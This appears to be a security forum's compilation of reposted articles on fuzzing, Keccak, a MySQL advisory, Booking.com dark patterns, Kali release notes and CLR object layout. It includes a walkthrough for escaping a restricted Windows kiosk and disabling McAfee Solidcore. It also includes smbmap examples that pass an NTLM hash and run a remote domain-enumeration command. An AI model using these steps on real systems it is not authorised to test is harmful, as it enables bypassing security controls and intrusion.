In this last chapter, I want to quickly summarize the fuzzing workflow which I recommend: Download as many input files as possible. Calculate a minset of input files which still triggers the full code/edge coverage (corpus distillation); use a Bloom filter for fast detection of new coverage. Minimize the file size of all input files in the minset. For the generated minset, calculate the code coverage (without the Bloom filter). Now we can statically add breakpoints (byte 0xCC) at all basic blocks which were not hit yet. This modified application can be started with all files from the input set and should not crash. However, we can continue downloading more files from the internet and start the modified binary with them (or just fuzz it). As soon as the application crashes (and our just-in-time configured debugger script kicks in) we know that a new code path was taken. Using this approach, we achieve native execution speed but still extract information about new coverage! (Downside: checksums inside files break; moreover, a fork server should also be used.) During fuzzing I recommend extracting edge coverage (which requires instrumentation), and therefore we should fuzz with instrumentation (and sanitizers / heap libraries). For every input, we conduct an analysis phase before fuzzing. This analysis phase does the following: First, identify the common code which gets executed for most inputs (for this we had to log the code coverage without the Bloom filter). Then get the code coverage for the current input and subtract the common code coverage from it. What we get is the code coverage which makes this fuzzing input "important" (code which only gets executed for this input). Next, we start our heatmap analysis, but we only log the read operations conducted by this "important" code!
What we get from this are the bytes which make our input "important". Now we don't have to fuzz the full input file, nor all the bytes which are read by the application; instead we only have to fuzz the few bytes which make the file "special"! I recommend focusing on these "special" bytes but also fuzzing the other bytes afterwards (fuzzing the special bytes fuzzes the new code; fuzzing all bytes fuzzes the old code with the new state resulting from the new code). Moreover, we can add additional slow checks which must be done only once per new input (e.g. log all heap allocations and check for dangling pointers after a free operation; a similar concept to Edge's MemGC). Of course, additional feedback mechanisms and symbolic execution can be added on top. Want to learn more about fuzzing? Come to one of my fuzzing talks (heise devSec or IT-SeCX for fuzzing applications with source code available, and DefCamp for fuzzing closed-source applications!) or just follow me on Twitter. Sursa: https://www.sec-consult.com/en/blog/2017/09/hack-the-hacker-fuzzing-mimikatz-on-windows-with-winafl-heatmaps-0day/index.html
  15. Metasploit Low Level View Saad Talaat (saadtalaat@gmail.com) @Sa3dtalaat Abstract: For the past (almost) decade, Metasploit has been the number one pentesting tool, and a lot of plug-ins have been developed specifically for it. The key point of this paper is to discuss the Metasploit framework as a code injector and payload encoder. Another key point of this paper is the different forms malware takes and how to evade anti-virus software (which has been a pain for pentesters lately), including how exactly anti-malware software works. Download: https://www.exploit-db.com/docs/18532.pdf
  16. Why Keccak is not ARX

If SHA-2 is not broken, why would one switch to SHA-3 and not just stay with SHA-2? There are several arguments why Keccak/SHA-3 is a better choice than SHA-2. In this post, we come back to a particular design choice of Keccak and explain why Keccak is not ARX, unlike SHA-2. We specified Keccak at the bit level using only transpositions, bit-level additions and multiplications (in GF(2)). We arranged these operations to allow efficient software implementations using fixed sequences of bitwise Boolean instructions and (cyclic) shifts. In contrast, many designers specify their primitives directly in pseudocode that similarly includes bitwise Boolean instructions and (cyclic) shifts, but on top of that also additions. These additions are modulo 2^n, with n a popular CPU word length such as 8, 32 or 64. Such primitives are dubbed ARX, which stands for "addition, rotation and exclusive-or (XOR)". The ARX approach is widespread and adopted by the popular designs MD4, MD5, SHA-1, SHA-2, Salsa, ChaCha, Blake(2) and Skein. So why isn't Keccak following the ARX road? We give some arguments in the following paragraphs.

ARX is fast! It is! Is it?

One of the main selling points of ARX is its efficiency in software: addition, rotation and XOR usually take only a single CPU cycle. For addition, this is not trivial because the carry bits may need to propagate from the least to the most significant bit of a word. Processor vendors have gone through huge efforts to make additions fast, and ARX primitives take advantage of this in a smart way. When trying to speed up ARX primitives with dedicated hardware, not much can be gained, unlike with bit-oriented primitives such as Keccak. Furthermore, the designer of an adder must choose between complexity (area, consumption) and gate delay (latency): it is either compact or fast, but not both at the same time.
A bitwise Boolean XOR (or AND, OR, NOT) does not have this trade-off: it simply takes a single XOR per bit and has the gate delay of a single binary XOR (or AND, OR, NOT) circuit. So the inherent computational cost of additions is a factor of 3 to 5 higher than that of bitwise Boolean operations. But even software ARX gets into trouble when power or electromagnetic analysis is a threat. Effective protection at the primitive level requires masking, namely representing each sensitive variable as the sum of two (or more) shares and performing the operations on the shares separately. For bitwise Boolean operations and (cyclic) shifts, this sum must be understood bitwise (XOR), while for addition the sum must be modulo 2^n. The trouble is that ARX primitives require many computationally intensive conversions between the two types of masking.

ARX is secure! It is! Is it?

The cryptographic strength of ARX comes from the fact that addition is not associative with rotation or XOR. However, it is very hard to estimate the security of such primitives. We give some examples to illustrate this. MD5 took almost 15 years to be broken, while the collision attacks that were finally found can be mounted almost by hand. For SHA-1, it took 10 years to convert the theoretical attacks of around 2006 into a real collision. More recently, at the FSE 2017 conference in Tokyo, some attacks on Salsa and ChaCha were presented which in retrospect look trivial but remained undiscovered for many years. Nowadays, when a new cryptographic primitive is published, one expects arguments for why it would resist differential and linear cryptanalysis. Evaluating this resistance means investigating the propagation of difference patterns and linear masks through the round function.
In ARX designs, the mere description of such difference propagation is complicated, and the study of linear mask propagation has only barely started, more than 25 years after the publication of MD5. A probable reason for this is that (crypt)analyzing ARX, despite its merits, is relatively unrewarding in terms of scientific publications: it does not lend itself to a clean mathematical description and usually amounts to hard and ad-hoc programming work. A substantial part of the cryptographic community is therefore reluctant to spend their time trying to cryptanalyze ARX designs. We feel that the cryptanalysis of more structured designs such as Rijndael/AES or Keccak/SHA-3 leads to publications that provide more insight.

ARX is serious! It is! Is it?

But if ARX is really so bad, why are there so many primitives from prominent cryptographers using it? Actually, the most recent hash function in Ronald L. Rivest's MD series, the SHA-3 candidate MD6, made use of only bitwise Boolean instructions and shifts. More recently, a large team including Salsa and ChaCha designer Daniel J. Bernstein published the non-ARX permutation Gimli. Gimli in turn refers to NORX for its design approach, a CAESAR candidate proposed by a team including Jean-Philippe Aumasson and whose name stems from a rather explicit "NO(T A)RX". Actually, they are moving in the direction where Keccak and its predecessors (e.g., RadioGatún, Noekeon, BaseKing) always were. So, maybe better skip ARX?

Sursa: https://keccak.team/2017/not_arx.html
  17. Breaking out of Restricted Windows Environment

ON JUNE 14, 2017 BY WEIRDGIRL

Many organizations these days use restricted Windows environments to reduce the attack surface. The more a system is hardened, the less functionality is exposed. I recently ran across such a scenario, where an already hardened system was protected by McAfee Solidcore. Solidcore was preventing users from making any changes to the system, like installing/uninstalling software, running executables, launching applications etc. The system (Windows 7) which I was testing boots right into the application login screen while restricting access to other OS functionality. I could not do anything with that system except restart it. I spent a whole week gathering information about the application and the system, which included social engineering as well. And then I got an entry point to start with. The credentials to log in to the application (which gave me a headache for one week) were available on the Internet (thanks to a Google dork). The credential I got was an admin credential. After logging in to the application there was no way to get out of it and into the base system. The application was so well designed that there was not a single way to escape it. Then I found an option in the application to print a document. I clicked on print-->printer settings-->add a printer-->location-->browse location, and I got access to the file browser of the host machine. Every Windows file explorer has a Windows help option which provides help about Windows features. It was possible to open a command prompt from the help option. I was only able to open the command prompt, but not any other Windows application. Even after getting access to the command prompt I was unable to make any changes to the system (not even open Notepad).
Every Windows application that I tried to open ended up with the following error message: The error made it very clear that the application was blocked and that it could be enabled either from the registry editor or the group policy editor. However, I did not have access to either of them; Solidcore was blocking access to both. So I used the following batch script to enable Task Manager. The script modifies the registry key (though I didn't know whether it was actually blocked via the registry editor or the group policy editor): And to my surprise, I was able to unlock Task Manager. Similarly, I was able to unlock and open Control Panel. My main objective was to disable or uninstall Solidcore, as it was restricting the desktop environment. But the system kept giving me challenges: I was able to uninstall any software except Solidcore. Then there was only one way left to disable Solidcore / enable installation of other software, and that was the Group Policy Editor. However, I didn't have direct access to gpedit. I used the following way to get access to it: Open Task Manager-->File-->New task-->Type MMC and press Enter. This opened the Microsoft Management Console. In MMC: File-->Add/Remove snap-in-->select Group Policy Objects and click Add. After this I was able to perform numerous actions like enabling blocked system applications, allowing access to the Desktop, disabling Windows restrictions etc. However, my main objective was to disable Solidcore and find a way to run any Windows executable. The Group Policy Editor provides an option to run/block only allowed Windows software, and this policy can be set in the following way: Group Policy Editor-->User Configuration > Administrative Templates > System. On the right side there's the option "Do not run specified Windows applications". Click on that: Edit-->Select Enabled-->Click on show list of disallowed applications-->then add the application name that you want to block (in my case it was Solidcore). Then click "Ok".
To apply the changes I restarted my system. In the same way it is possible to manage the list of applications allowed to run in Windows (including a malicious one). And that's how I was able to break out of a completely restricted desktop environment.

Sursa: https://weirdgirlweb.wordpress.com/2017/06/14/first-blog-post/
  18. [RHSA-2017:2787-01] Important: rh-mysql56-mysql security and bug fix update From: "Security announcements for all Red Hat products and services." <rhsa-announce@xxxxxxxxxx> To: rhsa-announce@xxxxxxxxxx Date: Thu, 21 Sep 2017 03:43:23 -0400 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: rh-mysql56-mysql security and bug fix update Advisory ID: RHSA-2017:2787-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2017:2787 Issue date: 2017-09-21 CVE Names: CVE-2016-5483 CVE-2016-8327 CVE-2017-3238 CVE-2017-3244 CVE-2017-3257 CVE-2017-3258 CVE-2017-3265 CVE-2017-3273 CVE-2017-3291 CVE-2017-3302 CVE-2017-3305 CVE-2017-3308 CVE-2017-3309 CVE-2017-3312 CVE-2017-3313 CVE-2017-3317 CVE-2017-3318 CVE-2017-3450 CVE-2017-3452 CVE-2017-3453 CVE-2017-3456 CVE-2017-3461 CVE-2017-3462 CVE-2017-3463 CVE-2017-3464 CVE-2017-3599 CVE-2017-3600 CVE-2017-3633 CVE-2017-3634 CVE-2017-3636 CVE-2017-3641 CVE-2017-3647 CVE-2017-3648 CVE-2017-3649 CVE-2017-3651 CVE-2017-3652 CVE-2017-3653 ===================================================================== 1. Summary: An update for rh-mysql56-mysql is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 
7.3) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64 3. Description: MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs. The following packages have been upgraded to a later upstream version: rh-mysql56-mysql (5.6.37). Security Fix(es): * An integer overflow flaw leading to a buffer overflow was found in the way MySQL parsed connection handshake packets. An unauthenticated remote attacker with access to the MySQL port could use this flaw to crash the mysqld daemon. (CVE-2017-3599) * It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) * Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) * It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291) * It was discovered that the MySQL client command line tools only checked after authentication whether server supported SSL. A man-in-the-middle attacker could use this flaw to hijack client's authentication to the server even if the client was configured to require SSL connection. (CVE-2017-3305) * Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. 
The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) * A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) * This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages listed in the References section. (CVE-2016-8327, CVE-2017-3238, CVE-2017-3244, CVE-2017-3257, CVE-2017-3258, CVE-2017-3273, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3450, CVE-2017-3452, CVE-2017-3453, CVE-2017-3456, CVE-2017-3461, CVE-2017-3462, CVE-2017-3463, CVE-2017-3464, CVE-2017-3633, CVE-2017-3634, CVE-2017-3636, CVE-2017-3641, CVE-2017-3647, CVE-2017-3648, CVE-2017-3649, CVE-2017-3651, CVE-2017-3652, CVE-2017-3653) Red Hat would like to thank Pali Rohár for reporting CVE-2017-3305. Bug Fix(es): * Previously, the md5() function was blocked by MySQL in FIPS mode because the MD5 hash algorithm is considered insecure. Consequently, the mysqld daemon failed with error messages when FIPS mode was enabled. With this update, md5() is allowed in FIPS mode for non-security operations. Note that users are able to use md5() for security purposes but such usage is not supported by Red Hat. (BZ#1452469) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 After installing this update, the MySQL server daemon (mysqld) will be restarted automatically. 5. 
Bugs fixed (https://bugzilla.redhat.com/): 1414133 - CVE-2017-3312 mysql: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 fix (CPU Jan 2017) 1414337 - CVE-2016-8327 mysql: Server: Replication unspecified vulnerability (CPU Jan 2017) 1414338 - CVE-2017-3238 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2017) 1414342 - CVE-2017-3244 mysql: Server: DML unspecified vulnerability (CPU Jan 2017) 1414350 - CVE-2017-3257 mysql: Server: InnoDB unspecified vulnerability (CPU Jan 2017) 1414351 - CVE-2017-3258 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017) 1414352 - CVE-2017-3273 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017) 1414353 - CVE-2017-3313 mysql: Server: MyISAM unspecified vulnerability (CPU Jan 2017) 1414355 - CVE-2017-3317 mysql: Logging unspecified vulnerability (CPU Jan 2017) 1414357 - CVE-2017-3318 mysql: Server: Error Handling unspecified vulnerability (CPU Jan 2017) 1414423 - CVE-2017-3265 mysql: unsafe chmod/chown use in init script (CPU Jan 2017) 1414429 - CVE-2017-3291 mysql: unrestricted mysqld_safe's ledir (CPU Jan 2017) 1422119 - CVE-2017-3302 mysql: prepared statement handle use-after-free after disconnect 1431690 - CVE-2017-3305 mysql: incorrect enforcement of ssl-mode=REQUIRED in MySQL 5.5 and 5.6 1433010 - CVE-2016-5483 CVE-2017-3600 mariadb, mysql: Incorrect input validation allowing code execution via mysqldump 1443358 - CVE-2017-3308 mysql: Server: DML unspecified vulnerability (CPU Apr 2017) 1443359 - CVE-2017-3309 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443363 - CVE-2017-3450 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2017) 1443364 - CVE-2017-3452 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443365 - CVE-2017-3453 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443369 - CVE-2017-3456 mysql: Server: DML unspecified vulnerability (CPU Apr 2017) 1443376 - CVE-2017-3461 mysql: Server: Security: 
Privileges unspecified vulnerability (CPU Apr 2017) 1443377 - CVE-2017-3462 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017) 1443378 - CVE-2017-3463 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017) 1443379 - CVE-2017-3464 mysql: Server: DDL unspecified vulnerability (CPU Apr 2017) 1443386 - CVE-2017-3599 mysql: integer underflow in get_56_lenc_string() leading to DoS (CPU Apr 2017) 1472683 - CVE-2017-3633 mysql: Server: Memcached unspecified vulnerability (CPU Jul 2017) 1472684 - CVE-2017-3634 mysql: Server: DML unspecified vulnerability (CPU Jul 2017) 1472686 - CVE-2017-3636 mysql: Client programs unspecified vulnerability (CPU Jul 2017) 1472693 - CVE-2017-3641 mysql: Server: DML unspecified vulnerability (CPU Jul 2017) 1472703 - CVE-2017-3647 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017) 1472704 - CVE-2017-3648 mysql: Server: Charsets unspecified vulnerability (CPU Jul 2017) 1472705 - CVE-2017-3649 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017) 1472708 - CVE-2017-3651 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2017) 1472710 - CVE-2017-3652 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017) 1472711 - CVE-2017-3653 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017) 1477575 - service start fails due to wrong selinux type of logfile 1482122 - Test case failure: /CoreOS/mysql/Regression/bz1149143-mysql-general-log-doesn-t-work-with-FIFO-file Sursa: https://mailinglist-archive.mojah.be/redhat-announce/2017-09/msg00048.php
  19. How Booking.com manipulates you

Published on September 17, 2017; tags: Misc

Many websites and applications these days are designed to trick you into doing things that their creators want. Here are some examples from timewellspent.io:

YouTube autoplays more videos to keep us from leaving.
Instagram shows new likes one at a time, to keep us checking for more.
Facebook wants to show whatever keeps us scrolling.
Snapchat turns conversations into streaks we don’t want to lose.
Our media turns events into breaking news to keep us watching.

But one of the most manipulative websites I’ve ever come across is Booking.com, the large hotel search & booking service. If you have ever used Booking.com, you probably noticed (and hopefully resisted!) some of the ways it nudges you to book whatever property you are looking at. Let’s see what’s going on here.

Prices

First, it tries to persuade you that the price is low. “Jackpot! This is the cheapest price you’ve seen in London for your dates!” Of course it is — this is literally the first price I am seeing for these dates — so the statement is tautological. The first price I see will automatically be the lowest I will have seen, no matter how ridiculously high it turns out to be. The statement “This is the highest price you’ve seen in London for your dates!” would be just as valid.

Likewise, the struck-through prices are there to anchor you and make the actual price seem like a great deal. The struck-through US$175 is the price before my 10% “genius” discount is applied — OK, that’s fair. But where does the US$189 come from? Let’s hover over the price to get an explanation:

I imagine most people will feel intimidated by the complex description, skip to the last sentence, and come away with the impression that “you get the same room for a lower price compared to other check-in dates”. (If this weren’t the case, Booking.com’s marketing department would change the wording until it were.) But what is it actually saying?
If there is only one room of this type, then 90% of the time there will be the appearance of a lucky deal. What you should be reading is “If I choose this, I am not a total loser”. And if there are 3 comparable room types with differential pricing, there is even less reason to feel good about this — you’ve successfully avoided the worst 3% of the offerings.

Urgency

Another way Booking.com manipulates you is by conveying a sense of urgency.

“In high demand - only 3 rooms left on our site!”
“33 other people looking now, according to our Booking.com travel scientists” (what?)
“Last chance! Only 1 room left on our site!”

And just to prove they are not kidding, they will show you something that you’ve missed already:

But my favorite one is this red badge:

Although it cannot be seen on the screenshot, the badge doesn’t appear right away when you open the page. Instead, it pops up one or two seconds later, making it seem like a realtime notification — an impression reinforced by the alarm clock icon. To be clear, it is not realtime, and there is no reason to delay its display other than to trick you.

How much time has elapsed since the last booking doesn’t simply play on our irrational emotions. It is a valuable piece of information that can be used to estimate the rate at which these rooms are being booked. By a Gott-like argument (see Algorithms to Live By for an excellent explanation), if the last booking was made 4 hours ago, you can estimate that a room is booked about every 8 hours. Plenty of time to relax and compare your options. If, on the other hand, the last booking happened just two seconds ago, you’d better not waste another second before entering your credit card number.

Kudos to Booking for at least providing the actual information in a tooltip window (I wonder what regulations make them do that), but not all users will hover to read it, and even then, something that you experience (a badge popping up) will probably take precedence over what you later read.
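The Gott-like estimate above can be sketched in a couple of lines of Python. This is my paraphrase of the argument, under the Copernican-style assumption that you observe the interval between bookings at a uniformly random moment, so on average you are halfway through it:

```python
# Gott-style estimate: observed at a random moment, you are on average halfway
# through the interval between bookings, so the full interval is roughly twice
# the time elapsed since the last booking.

def estimated_hours_between_bookings(hours_since_last_booking):
    return 2.0 * hours_since_last_booking

# Last booking 4 hours ago: a room is booked roughly every 8 hours.
print(estimated_hours_between_bookings(4))  # 8.0
```

It is only a rough point estimate, of course, but it is a far better use of the "last booked N hours ago" badge than panicking.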
The “Someone just booked this” badge does not just make you worry that the room you are considering will soon be snatched; it also reassures you. If other people are actively booking this property, it must be good. Of course, the person who made a reservation 4 hours ago has not yet visited the hotel and so probably has little more knowledge than you. Their decision to book was probably, to some extent, influenced by the same red badge. This situation, where everyone relies on everyone else to have accurate information, is also well described in Algorithms to Live By.

Reviews

Instead of listening to people who have just booked the property but have not yet visited it, we should turn to those who have been there, right? That’s what reviews are for! But Booking.com managed to game the reviews, too.

There are quite a few crappy hotels out there, especially on the cheaper end of the spectrum. These are the hotels you and I would want to avoid, but if we did, Booking would not make money on them. An extreme example is the hotel I’m currently staying at, New Union. From its Booking.com page you wouldn’t think there’s anything wrong with it, would you?

If you spend enough time perusing that page, you’ll eventually stumble upon the “fine print”: “noise may be heard whilst the bar is open” is an understatement; the music is so loud that the floor in my room shakes very perceptibly, and the bar is open until late at night/early in the morning. And why is this warning hidden in the fine print instead of being a big red fucking badge? To be fair, this is more the hotel’s fault than Booking’s. Also, I should have read the fine print. Or the reviews.

But wait, I’ve read the reviews: What I didn’t realize while skimming an overloaded webpage was that the reviews displayed on the main page had been cherry-picked. The full list of reviews is available from a separate page.
Ratings

Notice something interesting here: the first, moderately negative review gives the place a rating of 7 out of 10, and the second review, probably as negative as it gets, gives it almost a 6. As a result, the overall rating of the property is high (7.6), and even the distribution of ratings does not look alarming.

Unlike IMDB or Amazon, where you simply give a movie or product a number of stars, when you rate your stay on Booking.com, you evaluate it on several factors: location, cleanliness, facilities, etc. But Booking.com doesn’t present the individual ratings; it presents the averages (like 7.1 or 5.8), and the average of those averages (the overall rating of a property). It is unlikely that all factors will be bad simultaneously, but a problem in just one of them may easily ruin your trip. A great location will not compensate for dirty sheets, but Booking.com thinks otherwise.

What to do with all of this

Frankly, I don’t think I am going to stop using Booking.com. I am not aware of any other service with a comparable number of properties and reviews. Instead, we need to be aware of all the ways Booking is trying to screw us over and try to counter them:

Ignore the urgency-provoking red text and the anchoring struck-through prices.
Do not rely on the magnitude of the ratings. I think it is still fine to use them as a sorting criterion.
Do not read the cherry-picked reviews on the main page. Go to the review page (“Our guests’ experiences”) and sort the reviews from newest to oldest, to get an up-to-date and hopefully unbiased selection.

Sursa: https://ro-che.info/articles/2017-09-17-booking-com-manipulation
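The rating dilution described in the article is easy to verify with a back-of-the-envelope calculation. The factor names and scores below are invented for illustration, not taken from the site:

```python
# A single terrible factor barely dents an average of otherwise good scores.

def overall_rating(factor_scores):
    return sum(factor_scores) / len(factor_scores)

# Hypothetical property: great location and staff, but dirty sheets.
scores = {"location": 9.0, "staff": 9.0, "facilities": 8.0, "cleanliness": 3.0}
print(round(overall_rating(list(scores.values())), 2))  # 7.25
```

A 3/10 for cleanliness still yields a respectable-looking 7.25 overall, which is exactly the "great location will not compensate for dirty sheets" problem.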
  20. Kali Linux 2017.2 Release

September 20, 2017, dookie

We are happy to announce the release of Kali Linux 2017.2, available now for your downloading pleasure. This release is a roll-up of all updates and fixes since our 2017.1 release in April. In tangible terms, if you were to install Kali from your 2017.1 ISO, after logging in to the desktop and running ‘apt update && apt full-upgrade’, you would be faced with something similar to this daunting message:

1399 upgraded, 171 newly installed, 16 to remove and 0 not upgraded.
Need to get 1,477 MB of archives.
After this operation, 1,231 MB of additional disk space will be used.
Do you want to continue? [Y/n]

That would make for a whole lot of downloading, unpacking, and configuring of packages. Naturally, these numbers don’t tell the entire tale, so read on to see what’s new in this release.

New and Updated Packages in Kali 2017.2

In addition to all of the standard security and package updates that come to us via Debian Testing, we have also added more than a dozen new tools to the repositories, a few of which are listed below. There are some really nice additions, so we encourage you to ‘apt install’ the ones that pique your interest and check them out.
hurl – a useful little hexadecimal and URL encoder/decoder
phishery – lets you inject SSL-enabled basic auth phishing URLs into a .docx Word document
ssh-audit – an SSH server auditor that checks for encryption types, banners, compression, and more
apt2 – an Automated Penetration Testing Toolkit that runs its own scans or imports results from various scanners, and takes action on them
bloodhound – uses graph theory to reveal the hidden or unintended relationships within Active Directory
crackmapexec – a post-exploitation tool to help automate the assessment of large Active Directory networks
dbeaver – powerful GUI database manager that supports the most popular databases, including MySQL, PostgreSQL, Oracle, SQLite, and many more
brutespray – automatically attempts default credentials on discovered services

On top of all the new packages, this release also includes numerous package updates, including jd-gui, dnsenum, edb-debugger, wpscan, watobo, burpsuite, and many others. To check out the full list of updates and additions, refer to the Kali changelog on our bug tracker.

Ongoing Integration Improvements

Beyond the new and updated packages in this release, we have also been working towards improving the overall integration of packages in Kali Linux. One area in particular is program usage examples. Many program authors assume that their application will only be run in a certain manner or from a certain location. For example, the SMBmap application has a binary name of ‘smbmap’, but if you were to look at the usage example, you would see this:

Examples:
$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1
$ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -h 10.1.3.30 -x 'net group "Domain Admins" /domain'

If you were a novice user, you might see these examples, try to run them verbatim, find that they don’t work, assume the tool doesn’t work, and move on. That would be a shame, because smbmap is an excellent program, so we have been working on fixing these usage discrepancies to help improve the overall fit and finish of the distribution. If you run ‘smbmap’ in Kali 2017.2, you will now see this output instead:

Examples:
$ smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1
$ smbmap -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
$ smbmap -u 'apadmin' -p 'asdf1234!' -d ACME -h 10.1.3.30 -x 'net group "Domain Admins" /domain'

We hope that small tweaks like these will help reduce confusion for both veterans and newcomers, and it’s something we will continue working towards as time goes on.

Learn More About Kali Linux

In the time since the release of 2017.1, we also released our first book, Kali Linux Revealed, in both physical and online formats. If you are interested in going far beyond the basics, really want to learn how Kali Linux works, and how you can leverage its many advanced features, we encourage you to check it out. Once you have mastered the material, you will have the foundation required to pursue the Kali Linux Certified Professional certification.

Kali ISO Downloads, Virtual Machines and ARM Images

The Kali Rolling 2017.2 release can be downloaded via our official Kali Download page. This release, we have also updated our Kali Virtual Images and Kali ARM Images downloads. As always, if you already have Kali installed and running to your liking, all you need to do in order to get up to date is run the following:

apt update
apt dist-upgrade
reboot

We hope you enjoy this fine release as much as we enjoyed making it!

Sursa: https://www.kali.org/news/kali-linux-2017-2-release/
  21. Managed object internals, Part 1. The layout

Sergey Teplyakov, May 26, 2017

The layout of a managed object is pretty simple: a managed object contains instance data, a pointer to metadata (a.k.a. the method table pointer) and a bag of internal information also known as the object header. The first time I read about it, I had a few questions: why is the layout of an object so weird? Why does a managed reference point into the middle of an object, with the object header at a negative offset? What information is stored in the object header?

When I started thinking about the layout and did some quick research, I came up with a few possible explanations:

1. The JVM used a similar layout for its managed objects from the inception. It may sound a bit crazy today, but remember that C# has one of the worst features of all time (a.k.a. array covariance) just because Java had it back in the day. Compared to that decision, reusing some ideas about the structure of an object doesn’t sound that unreasonable.

2. The object header can grow in size with no cross-cutting changes in the CLR. The object header holds some auxiliary information used by the CLR, and it is possible that the CLR could come to require more than a pointer-size field. Indeed, the .NET Compact Framework used in mobile phones had different headers for small and large objects (see WP7: CLR Managed Object overhead for more details). The desktop CLR never used this ability, but that doesn’t mean it is impossible in the future.

3. Cache lines and other performance-related characteristics. Chris Brumme, one of the CLR architects, mentioned in a comment on his post “Value Types” that cache friendliness is the very reason for the managed object layout. It is theoretically possible that, due to the cache line size (64 bytes), it is more efficient to access fields that are closer to each other. This means that dereferencing the method table pointer followed by an access to some field should show a performance difference depending on the location of the field inside the object. I spent some time trying to prove that this is still true for modern processors, but was unable to produce any benchmark that showed a difference.

After spending some time trying to validate my theories, I contacted Vance Morrison with this very question and got the following answer: the current design was made with no particular performance considerations. So, the answer to the question "Why is the managed object’s layout so weird?" is simple: "historical reasons". And, to be honest, I can see the logic in placing the object header at a negative offset: it emphasizes that this piece of data is an implementation detail of the CLR, that its size can change over time, and that it should not be inspected by the user.

Now it’s time to inspect the layout in more detail. But before that, let’s think: what extra information could the CLR associate with a managed object instance? Here are some ideas:

· Special flags that the GC can use to mark that an object is reachable from the application roots.
· A special flag that notifies the GC that an object is pinned and should not be moved during garbage collection.
· The hash code of a managed object (when the GetHashCode method is not overridden).
· Critical section and other information used by a lock statement: the thread that acquired the lock, etc.

Apart from the instance state, the CLR stores a lot of information associated with a type, like the method table, interface maps, instance size and so on, but this is not relevant to our current discussion.

IsMarked flag

The managed object header is a multi-purpose chameleon that serves many different purposes, and you might think that the garbage collector (GC) uses a bit from the object header to mark that the object is referenced by a root and should be kept alive. This is a common misconception, and a few very famous books are to blame (*), namely “CLR via C#” by Jeffrey Richter, “Pro .NET Performance” by Sasha Goldstein et al. and, certainly, some others.

Instead of using the object header, the CLR authors decided on one clever trick: during garbage collection, the lowest bit of the method table pointer is used to store a flag indicating that the object is reachable and should not be collected. Here is the actual implementation of the ‘mark’ flag from the coreclr repo, file gc.cpp, line 8974 (**):

(**) Unfortunately, the gc.cpp file is so big that GitHub refuses to analyze it. This means that I can’t add a hyperlink to a specific line of code.

Managed pointers in the CLR heap are aligned on 4-byte or 8-byte address boundaries, depending on the platform. This means that 2 or 3 bits of every pointer are always 0 and can be used for other purposes. The same trick is used by the JVM under the name ‘Compressed Oops’: the feature that allows the JVM to have a 32 GB heap and still use 4 bytes per managed pointer. Technically speaking, even on a 32-bit platform there are 2 bits that can be used for flags. Based on a comment in the object.h file, we might conclude that this is indeed the case and that the second-lowest bit of the method table pointer is used for pinning (to mark that the object should not be moved during the compaction phase of garbage collection). Unfortunately, it is not clear whether this is true, because the SetPinned/IsPinned methods in gc.cpp (lines 3850-3859) are implemented using a reserved bit from the object header, and I was unable to find any code in the coreclr repo that actually sets that bit of the method table pointer.

Next time we’ll discuss how locks are implemented and check how expensive they are.
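The low-bit trick is easy to illustrate with plain integers standing in for aligned addresses. This is an illustrative sketch, not the coreclr code; the helper names are made up:

```python
# Because heap addresses are 4- or 8-byte aligned, the lowest bits of a method
# table pointer are always zero and can temporarily carry GC flags.

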